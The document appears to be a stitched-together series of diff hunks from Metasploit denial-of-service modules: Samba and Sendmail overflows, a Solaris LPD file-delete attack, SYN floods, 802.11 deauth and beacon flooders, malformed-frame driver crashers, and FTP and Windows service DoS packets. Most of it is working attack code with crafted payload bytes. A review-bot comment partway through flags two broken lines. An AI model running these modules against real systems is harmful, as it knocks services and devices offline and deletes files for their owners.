include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Samba lsa_io_trans_names Heap Overflow',
'Description' => %q{
This module triggers a heap overflow in the LSA RPC service
@ -35,18 +35,18 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '34699'],
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
], self.class)
end
def run
pipe = datastore['SMBPIPE'].downcase
print_status("Connecting to the SMB service...")
connect()
smb_login()
@ -82,10 +82,10 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
dcerpc.call(0x0f, stub)
disconnect
disconnect
end
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption',
'Description' => %q{
This is a proof of concept denial of service module for Sendmail versions

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Solaris LPD Arbitrary File Delete',
'Description' => %q{
This module uses a vulnerability in the Solaris line printer
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
can be used to exploit the rpc.walld format string flaw, the
missing krb5.conf authentication bypass, or simply delete
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
},
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
'License' => MSF_LICENSE,
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
]
))
register_options(
[
Opt::RPORT(515),
@ -49,21 +49,21 @@ class Metasploit3 < Msf::Auxiliary
end
def run
r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
r_user = Rex::Text.rand_text_alpha(rand(8)+1)
r_spool = Rex::Text.rand_text_alpha(rand(8)+1)
# Create a simple control file...
control = "H#{r_hostname}\nP#{r_user}\n";
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
# Establish the first connection to the server
sock1 = connect(false)
# Request a cascaded job
sock1.put("\x02#{r_hostname}:#{r_spool}\n")
res = sock1.get_once
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("The target did not accept our job request command")
return
end
# Theoretically, we could delete multiple files at once, however
# the lp daemon will append garbage from memory to the path name
# if we don't stick a null byte after the path. Unfortunately, this
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
dataf = Rex::Text.rand_text_alpha(100)+1
print_status("Deleting #{datstore['RPATH']}...")
if !(
send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
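Review bot: `print_status("Deleting #{datstore['RPATH']}...")` references `datstore`, which is not defined, so the module raises NameError on every run before the delete request is sent; it should read `datastore['RPATH']`, as the surrounding lines do. The line above, `dataf = Rex::Text.rand_text_alpha(100)+1`, adds an Integer to the String returned by `rand_text_alpha` and would raise TypeError if reached — presumably `Rex::Text.rand_text_alpha(rand(100)+1)` was intended, matching the `rand(8)+1` pattern used for `r_hostname`. Both lines are untouched context in this hunk; `run` starts in an earlier hunk and continues past this one.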
@ -88,28 +88,28 @@ class Metasploit3 < Msf::Auxiliary
sock1.close
return
end
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
sock1.close
end
def send_file(s, type, name, data='')
s.put(type.chr + data.length.to_s + " " + name + "\n")
res = s.get_once(1)
if !(res and res[0] == ?\0)
print_status("The target did not accept our control file command (#{name})")
return
end
s.put(data)
s.put("\x00")
res = s.get_once(1)
if !(res and res[0] == ?\0)
print_status("The target did not accept our control file data (#{name})")
return
end
end
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
return true
end

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => 'todb',
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
['BID', '37670'],
['OSVDB', '61538'],
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
])
deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
end
@ -77,11 +77,10 @@ class Metasploit3 < Msf::Auxiliary
n.l4.ack = 0
n.l4.seq = rand(0xffffffff)
n.l4.add_option(101,"")
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack
print_status("#{n.l3.dst_ip}:#{n.l4.dst_port} Sending TCP Syn packet from #{n.l3.src_ip}:#{n.l4.src_port}")
capture_sendto(pkt,rhost)
close_pcap
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
])
deregister_options('FILTER','PCAPFILE')
end
@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary
while (num <= 0) or (sent < num)
n.l3.src_ip = srchost
n.l3.src_ip = srchost
n.l3.id = rand(0x10000)
n.l3.ttl = rand(128)+128
n.l3.ttl = rand(128)+128
n.l4.window = rand(4096)+1
n.l4.src_port = sport
n.l4.seq = rand(0x100000000)
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
pkt = n.pack


@ -1,18 +1,29 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless CTS/RTS Flooder',
'Description' => %q{
This module sends 802.11 CTS/RTS requests to a specific wireless peer,
using the specified source address,
using the specified source address,
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -37,21 +48,21 @@ class Metasploit3 < Msf::Auxiliary
when 'CTS'
frame =create_cts()
else
else
print_status("No TYPE selected!!")
return
return
end
open_wifi
open_wifi
print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
datastore['NUM'].to_i.times do
wifi.write(frame)
end
end
end
def create_rts
frame =
"\xb4" + # Type/SubType
"\x00" + # Flags
@ -62,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary
return frame
end
def create_cts
frame =
frame =
"\xc4" + # Type/SubType
"\x00" + # Flags
"\xff\x7f" + # Duration


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,21 +19,21 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
'Description' => %q{
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
that does not contain valid information element (IE) fields after the fixed-length header. The data
following the fixed-length header is copied over internal kernel structures, resulting in memory
that does not contain valid information element (IE) fields after the fixed-length header. The data
following the fixed-length header is copied over internal kernel structures, resulting in memory
operations being performed on attacker-controlled pointer values.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
['CVE', '2006-5710'],
['OSVDB', '30180'],
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
], self.class)
end
#
@ -54,38 +54,38 @@ class Metasploit3 < Msf::Auxiliary
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
def create_frame
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) # capabilities
frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
return frame
end
end
end
=begin


@ -1,10 +1,21 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless DEAUTH Flooder',
@ -12,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
This module sends 802.11 DEAUTH requests to a specific wireless peer,
using the specified source address and source BSSID.
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
print_status("Creating Deauth frame with the following attributes:")
print_status("\tDST: #{datastore['ADDR_DST']}")
print_status("\tSRC: #{datastore['ADDR_SRC']}")
@ -41,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
wifi.write(create_deauth())
end
close_wifi
end
end
def create_deauth
seq = [rand(255)].pack('n')
seq = [rand(255)].pack('n')
frame =
"\xc0" + # Type/SubType
"\x00" + # Flags
@ -53,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
eton(datastore['ADDR_DST']) + # dst addr
eton(datastore['ADDR_SRC']) + # src addr
eton(datastore['ADDR_BSS']) + # BSSID
seq + # sequence number
seq + # sequence number
"\x07\x00" # Reason Code (nonassoc. sta)
return frame
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -20,18 +20,18 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Fake Access Point Beacon Flood',
'Description' => %q{
This module can advertise thousands of fake access
points, using random SSIDs and BSSID addresses. Inspired
by Black Alchemy's fakeap tool.
},
'Author' => [ 'hdm', 'kris katterjohn' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
))
register_options([
OptInt.new('NUM', [false, "Number of beacons to send"]),
@ -59,39 +59,39 @@ class Metasploit3 < Msf::Auxiliary
bssid = Rex::Text.rand_text(6)
end
seq = [rand(255)].pack('n')
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
# traffic indication map
"\x05" + "\x04" + "\x00\x01\x02\x20" +
# country information
"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
# erp information
"\x2a" + "\x01" + "\x00" +
# extended supported rates
"\x32" + "\x04" + "\x12\x24\x60\x6c"
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,25 +17,25 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear MA521 wireless device
driver under Windows XP. When a specific malformed frame (beacon or probe response)
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
driver attempts to write to an attacker-controlled memory location. The vulnerability
is triggered by an invalid supported rates information element.
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '30507'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
]
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
], self.class)
], self.class)
end
def run
@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary
ssid = Rex::Text.rand_text(6)
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,39 +17,39 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear WG311v1 wireless device
driver under Windows XP and 2000. A kernel-mode heap overflow occurs
when malformed probe response frame is received that contains a long SSID field
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
NetGear WG311v1 PCI card. A remote code execution module is also in development.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-6125'],
['OSVDB', '30511'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
]
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
], self.class)
end
def run
@ -78,15 +78,15 @@ class Metasploit3 < Msf::Auxiliary
def create_probe_response
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
@ -99,10 +99,10 @@ class Metasploit3 < Msf::Auxiliary
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end
end
end
=begin


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,40 +19,40 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
'Description' => %q{
This module exploits a firmware-level vulnerability in a variety of
This module exploits a firmware-level vulnerability in a variety of
802.11b devices. This attack works by sending a probe response frame
containing a NULL SSID information element to an affected device. This
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
Orinoco, and the first generation of Airport cards).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
['WVE', '2006-0064']
['WVE', '2006-0064']
]
))
register_options(
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
], self.class)
end
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
@ -61,21 +61,21 @@ class Metasploit3 < Msf::Auxiliary
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) + # capabilities
[0, 0].pack('CC') # Type=SSID(0) Length=0
return frame
end
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Test Module',
'Description' => %q{
This module is a test of the wireless packet injection system.
Please see external/ruby-lorcon/README for more information.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
))
end
def run


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,15 +17,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS',
'Description' => %q{
This module exploits a denial of service flaw in the Appian
Enterprise Business Suite service.
Enterprise Business Suite service.
},
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
@ -37,17 +37,17 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Dec 17 2007'
))
register_options([Opt::RPORT(5400),], self.class)
end
def run
print_status('Connecting to the service...')
connect
# mod: randomize the static "saint" strings from the PoC - hdm
req =
req =
"\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00" +
@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary
"\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+
"\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+
"\x00"
print_status('Sending exploit...')
sock.put(req)
disconnect
end


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
'Description' => %q{
The Titan FTP server v6.26 build 630 can be DoS'd by


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',
'Description' => %q{
This module is a port of shinnai's script. You need


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
'Description' => %q{
You need a valid login to DoS this FTP server, but


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,14 +17,14 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Windows NAT Helper Denial of Service',
'Description' => %q{
This module exploits a denial of service vulnerability
within the Internet Connection Sharing service in
Windows XP.
within the Internet Connection Sharing service in
Windows XP.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2006-5614' ],
],
'DisclosureDate' => 'Oct 26 2006'))
register_options([Opt::RPORT(53),], self.class)
end
@ -46,14 +46,15 @@ class Metasploit3 < Msf::Auxiliary
pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
pkt << Rex::Text.rand_text_english(10) + "\x03"
pkt << Rex::Text.rand_text_english(3)
pkt << Rex::Text.rand_text_english(3)
pkt << "\x00\x00\x01\x00\x01"
print_status("Sending dos packet...")
udp_sock.put(pkt)
disconnect_udp
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -15,22 +15,22 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Plug and Play Service Registry Overflow',
'Description' => %q{
This module triggers a stack overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account. Since the PnP
service runs inside the service.exe process, this module
will result in a forced reboot on Windows 2000. Obtaining
will result in a forced reboot on Windows 2000. Obtaining
code execution is possible if user-controlled memory can
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -43,12 +43,12 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '18830' ]
]
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
], self.class)
end
=begin
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
# Determine which pipe to use
pipe = datastore['SMBPIPE']
print_status("Connecting to the SMB service...")
connect()
smb_login()
@ -91,12 +91,12 @@ class Metasploit3 < Msf::Auxiliary
path = "HTREE\\ROOT" + ("\\" * i)
# 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)
stubdata =
stubdata =
NDR.long(rand(0xffffffff)) +
NDR.wstring(path) +
NDR.wstring(path) +
NDR.long(4) +
NDR.long(1) +
NDR.long(1) +
print_status("Calling the vulnerable function...")
@ -111,8 +111,8 @@ class Metasploit3 < Msf::Auxiliary
raise e
end
end
disconnect
disconnect
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
'Description' => %q{
This module triggers a kernel pool corruption bug in SRV.SYS. Each
call to the mailslot write function results in a two byte return value
call to the mailslot write function results in a two byte return value
being written into the response packet. The code which creates this packet
fails to consider these two bytes in the allocation routine, resulting in
a slow corruption of the kernel memory pool. These two bytes are almost
a slow corruption of the kernel memory pool. These two bytes are almost
always set to "\xff\xff" (a short integer with value of -1).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
